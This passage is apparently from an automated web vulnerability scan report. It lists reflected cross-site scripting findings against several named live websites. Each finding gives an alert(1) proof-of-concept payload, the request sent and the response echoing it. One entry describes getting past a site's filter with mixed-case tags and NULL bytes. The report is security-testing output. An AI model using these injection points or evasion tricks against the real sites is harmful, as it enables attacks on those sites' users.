User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailystrength.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat) mod_ssl/2.2.3 OpenSSL/0.9.8b PHP/5.2.9
X-Powered-By: PHP/5.2.9
Content-Type: text/html; charset=UTF-8
Expires: Sat, 02 Apr 2011 15:15:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 15:15:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=dciia9ia76n80faa1nbslhqso3; expires=Sat, 09-Apr-2011 15:15:24 GMT; path=/
Set-Cookie: _ds3=deleted; expires=Fri, 02-Apr-2010 15:15:23 GMT; path=/; domain=http://www.dailystrength.org
Set-Cookie: _ds0=deleted; expires=Fri, 02-Apr-2010 15:15:23 GMT; path=/; domain=http://www.dailystrength.org
Set-Cookie: _ds0=4b57e768d0e2eee9084fc1b973cd2348; path=/; domain=.dailystrength.org
Set-Cookie: _ds1=bY5BasMwEAC%2FYvaUQLXWamXLlgn9QKGHPKAokQICxzVOQiElf%2B8qufjQk4bdkUbBd%2F734slDhiF7PTz5CnL2Hi7ppJYU8wKv%2BbxyphWPhYk1ucaxsa9hXAmn%2F4QAQ%2FBc8sbDLZRGK9HjbRlrh4ZQV5twjq1V81H95InNthrzYb3%2FnNO033%2FUGnvsvqu7rGtCg1wea6T7JXJhlkT9bii6A6gwpuW6oa2CZC07F01HbkfFEy3PzwvyQXKM1LOkLBrLb5XRBRqkVhLiPx5%2F; path=/; domain=.dailystrength.org
Set-Cookie: _ds2=4b57e768d0e2eee9084fc1b973cd2348; path=/; domain=.dailystrength.org
Set-Cookie: _ds0=4b57e768d0e2eee9084fc1b973cd2348; path=/; domain=.dailystrength.org
Set-Cookie: _ds1=bY7BasMwDEB%2FJejUwuJYkhMlDqM%2FMOihHzDcJgOzzA1dS2Gl%2F165veSwkx%2FSs5%2BDb%2F3t16OHCH30tn%2FyGfQUD5f0nY7XBK%2FpvDDSgqfMyBalFib3Gg4L4es%2FIUAfPOc4aSjkRtN5OFxOUyWG0NhiFX6GxpXzobzGxLQuprhf7rfzmHa7j8qazrTH4k%2FXFRoynB%2BrtfupcmbWRLUhHGQPZZjG03mF6xJG51hkoBblHbOnWpyfF%2FSDKGywY005Q47fCrIZaoONJtS%2F3x8%3D; path=/; domain=.dailystrength.org
Set-Cookie: lastlink=%2F%3F21d7b%5C%22-alert%281%29-%5C%22e44377d2817%3D1; expires=Sat, 02-Apr-2011 16:15:24 GMT; path=/
Set-Cookie: _ds0=4b57e768d0e2eee9084fc1b973cd2348; path=/; domain=.dailystrength.org
Set-Cookie: _ds1=bY5BboMwEEWvgrxKpDJ4ZgwGo6oXqNRFDhA5gVSWCFiUqFKr3L1j2LDoyk%2F%2Bb%2BaPd7X7%2FXLoVFBtcLpdeVHpZaeu0%2F18m6dxif6zV1sYk4gbjzseVmaNtrRMZvvsdltv%2Fwletd5xuoGcevjUUTVS%2FJiHwgIh6Ozg711l8njNv8PIdMyGcNnnH7EfT6f3QkMD9ZT9SFwgEHBaVkrvWeTELBXFG2FnLyr3Qz8vBzzmqjeGre2oRvuKyRMtxHVADkTLgA1LlQEy%2FJKRTlACVlIh%2FvP5Bw%3D%3D; path=/; domain=.dailystrength.org
Set-Cookie: flags=deleted; expires=Fri, 02-Apr-2010 15:15:23 GMT; path=/
Set-Cookie: flags=deleted; expires=Fri, 02-Apr-2010 15:15:23 GMT; path=/
Content-Length: 49749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
< 10) { day = ("0" + String(day)) }
       var currentDate = (year + "-" + month + "-" + day);
       String(currentDate);

       s.pageName = "www.dailystrength.org/?21d7b"-alert(1)-"e44377d2817=1";
       s.channel = "default";
       s.server = "atlsvrweb01.netwebfarm.com";
       s.prop4 ="";
s.prop5 ="";
s.prop6 = "nonmember";
s.prop7 = ''
s.prop8 = ''
s.prop9 = ''
s.prop10 = ''
s.prop11 =
...[SNIP]...

2.24. http://www.ebgames.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebgames.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17243'><script>alert(1)</script>45828464d03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?17243'><script>alert(1)</script>45828464d03=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebgames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 15:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=ebgames.com; expires=Fri, 02-Apr-2021 15:44:50 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: CampaignHistory=3513,3582,3590,3591,3446,3447,3446,3537,3362,3571,3571,3326,3449,3525,3570,3383,3375,3375,3513,3582,3481,3558,3590,3446,3537,3446,3537,3362,3571,3571,3326,3449,3570,3525,3383; path=/
Set-Cookie: GS_ABState_J3v3D5J3LywnvVXkQsXrqljxNyX%2fOIWiyHqTgO7FFFg%3d=ABState_6xKtsz4Apxt83ElDgxbmifXthGIX5RygLf6ZZwsG8Ww%3d=A; expires=Mon, 02-May-2011 15:44:50 GMT; path=/
Content-Length: 289399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/?17243'><script>alert(1)</script>45828464d03=1' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

2.25. http://www.farmersalmanac.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.farmersalmanac.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eadf"><script>alert(1)</script>960828df2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2eadf\"><script>alert(1)</script>960828df2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2eadf"><script>alert(1)</script>960828df2e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.farmersalmanac.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:17:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 15:17:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: 84F4BA2A69803FB785FE0B9D675C9E86=WP+Cookie+check; path=/; domain=.farmersalmanac.com
X-Pingback: http://www.farmersalmanac.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 56254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?2eadf\"><script>alert(1)</script>960828df2e=1" />
...[SNIP]...

2.26. http://www.finecooking.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.finecooking.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8d0dd-->f45e9519164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?8d0dd-->f45e9519164=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.finecooking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 15:17:20 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Length: 135401
X-TPHOSTING: PROD
X-TPPROXY: nginxa
Cache-Control: private
x-tpredir: 301willcache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta name="google-
...[SNIP]...
<!-- lx081 http://adserver1.eseohserve.com/pull?v1=www.finecooking.com&v2=/index.aspx%3F8d0dd-->f45e9519164%3D1&v3=/index.aspx%3F8d0dd-->
...[SNIP]...

2.27. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fxnetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e73"><script>alert(1)</script>b20e69dece1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c4e73"><script>alert(1)</script>b20e69dece1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fxnetworks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Sat, 02 Apr 2011 15:39:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 15:39:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<input type="hidden" name="url" value="http://www.fxnetworks.com/?c4e73"><script>alert(1)</script>b20e69dece1=1" />
...[SNIP]...

2.28. http://www.fxnetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fxnetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35f81"-alert(1)-"6420fe2faa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?35f81"-alert(1)-"6420fe2faa5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fxnetworks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Sat, 02 Apr 2011 15:39:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 15:39:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
eout(function()
   {
       var url = "http" + (/https:/.test(document.location.href) ? "s" : "") +
       "://beacon.scorecardresearch.com/scripts/beacon.dll" +
       "?c1=2&c2=3005183&c3=&c4=www.fxnetworks.com/?35f81"-alert(1)-"6420fe2faa5=1" +
       "&c5=&c6=&c7=" + escape(document.location.href) +
       "&c8=" + escape(document.title) +
       "&c9=" + escape(document.referrer) +
       "&c10=" + escape(screen.width+'x'+screen.height) +
       "&c15="
...[SNIP]...

2.29. http://www.hotboysatplay.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotboysatplay.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c750b"><script>alert(1)</script>54a9d6e31a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c750b"><script>alert(1)</script>54a9d6e31a2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotboysatplay.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 15:17:02 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 57194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="http://www.hotboysatplay.com/categ.php?categ=HotBoysAtPlay_free&c750b"><script>alert(1)</script>54a9d6e31a2=1" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image33','','img/main_samples_up.gif',1)">
...[SNIP]...

2.30. http://www.importantscore.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.importantscore.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ac6"><script>alert(1)</script>5e961b20767 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?59ac6"><script>alert(1)</script>5e961b20767=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.importantscore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 15:57:52 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 12114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org
...[SNIP]...
<input type="hidden" name="return" value="/?59ac6"><script>alert(1)</script>5e961b20767=1">
...[SNIP]...

2.31. http://www.jobcentral.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jobcentral.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb07"><script>alert(1)</script>7bf12fb657b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4fb07"><script>alert(1)</script>7bf12fb657b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29783
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 15:48:57 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Jobs not ads | Direct Employers Job Search Engine | JobCentral</title>
...[SNIP]...
<a href="/index.asp?4fb07"><script>alert(1)</script>7bf12fb657b=1&adv=1" title="Add Advanced fields">
...[SNIP]...

2.32. http://www.k12jobspot.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.k12jobspot.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 106fd'-alert(1)-'caca1b64cac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?106fd'-alert(1)-'caca1b64cac=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.k12jobspot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 15:41:53 GMT
Last-Modified: Sat, 02 Apr 2011 15:31:53 GMT
Vary: *
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=kGrC7twnzAEkAAAAOTIzZTYyNTItNTAyMy00OWI2LThmMTAtZGYyYzY2NWNhMGRjUcs_e96mkG-JlKnqC7H8w_1a6So1; expires=Sat, 11-Jun-2011 02:11:53 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=mumpmp45nf2gs155eskvbs55; path=/; HttpOnly
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 15:31:54 GMT
Content-Length: 142237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-
...[SNIP]...
istControl1_PanelMapView');
if(null != mapPanel){
initMap('ctl00_contentHolderBody_JobListControl1_PanelListView','ctl00_contentHolderBody_JobListControl1_PanelMapView', '106fd'-alert(1)-'caca1b64cac=1', markerTableWidth);
}
else{

}
}
//]]>
...[SNIP]...

2.33. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktvb.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e370f"-alert(1)-"013fb82cd55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e370f"-alert(1)-"013fb82cd55=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ktvb.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r3-u7-b7
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=60
Date: Sat, 02 Apr 2011 15:52:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 205242

           <!DOCTYPE html>
<html lang="en-US">
<head>

<!--[if IE]><![endif]-->


<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

   
                                                                                                                           
...[SNIP]...
("BELO_additional_registration") == "") {
                   if(BELOJS.reg.pagecount.get() > 3) {
                       BELOJS.reg.pagecount.reset();
                       window.location = "/register/?form=int&docReferrer=http://www.ktvb.com/?e370f"-alert(1)-"013fb82cd55=1";
                   }
               }
           } else {
               if(BELOJS.reg.pagecount.get() >
...[SNIP]...

2.34. http://www.ktvb.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktvb.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2575c"><script>alert(1)</script>adfdf415058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2575c"><script>alert(1)</script>adfdf415058=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ktvb.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b9
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=59
Date: Sat, 02 Apr 2011 15:51:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 205399

           <!DOCTYPE html>
<html lang="en-US">
<head>

<!--[if IE]><![endif]-->


<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

   
                                                                                                                           
...[SNIP]...
<a href="/register/?form=login&docReferrer=http://www.ktvb.com/?2575c"><script>alert(1)</script>adfdf415058=1" class="signin">
...[SNIP]...

2.35. http://www.lef.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lef.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef0aa"-alert(1)-"cd85f2fc75d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ef0aa"-alert(1)-"cd85f2fc75d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lef.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:21:30 GMT
Server: Microsoft-IIS/6.0
Server: OWCMS2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Highest Qua
...[SNIP]...
<script language="javascript" type="text/javascript">
   var WebSiteBaseURL = "http://www.lef.org"
   var ThisPageFullURL = "http://www.lef.org/?ef0aa"-alert(1)-"cd85f2fc75d=1"
</script>
...[SNIP]...

2.36. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lyricsbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61b95"-alert(1)-"981aff1907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?61b95"-alert(1)-"981aff1907e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsbox.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:56:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: session_views=2; path=/; domain=.lyricsbox.com
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 15:56:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 16046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics</TITLE>
<META http-equiv="content-type" content="text/html;charset=iso-8859-1">
<META name=description
...[SNIP]...
<script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.lyricsbox.com/?61b95"-alert(1)-"981aff1907e=1",c5:"",c6:"",c15:""});</script>
...[SNIP]...

2.37. http://www.lyricsbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lyricsbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d840"><script>alert(1)</script>4546c14a081 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9d840"><script>alert(1)</script>4546c14a081=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsbox.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:56:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: session_views=2; path=/; domain=.lyricsbox.com
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 15:56:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 16076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics</TITLE>
<META http-equiv="content-type" content="text/html;charset=iso-8859-1">
<META name=description
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.lyricsbox.com/?9d840"><script>alert(1)</script>4546c14a081=1&c5=&c6=&c15=&cj=1"/>
...[SNIP]...

2.38. http://www.mobile9.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mobile9.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c0f"><ScRiPt>alert(1)</ScRiPt>544377bf744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /?31c0f"><ScRiPt>alert(1)</ScRiPt>544377bf744=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mobile9.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:26:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: session_id=accb2744a98d2dae5663ef29be0b9028; path=/; domain=.mobile9.com
Content-Type: text/html; charset=UTF-8
Content-Length: 30186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<a href="http://www.mobile9.com/?31c0f"><ScRiPt>alert(1)</ScRiPt>544377bf744=1&lang=cn">
...[SNIP]...

2.39. http://www.musicloversgroup.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.musicloversgroup.com
Path:   /

Issue detail

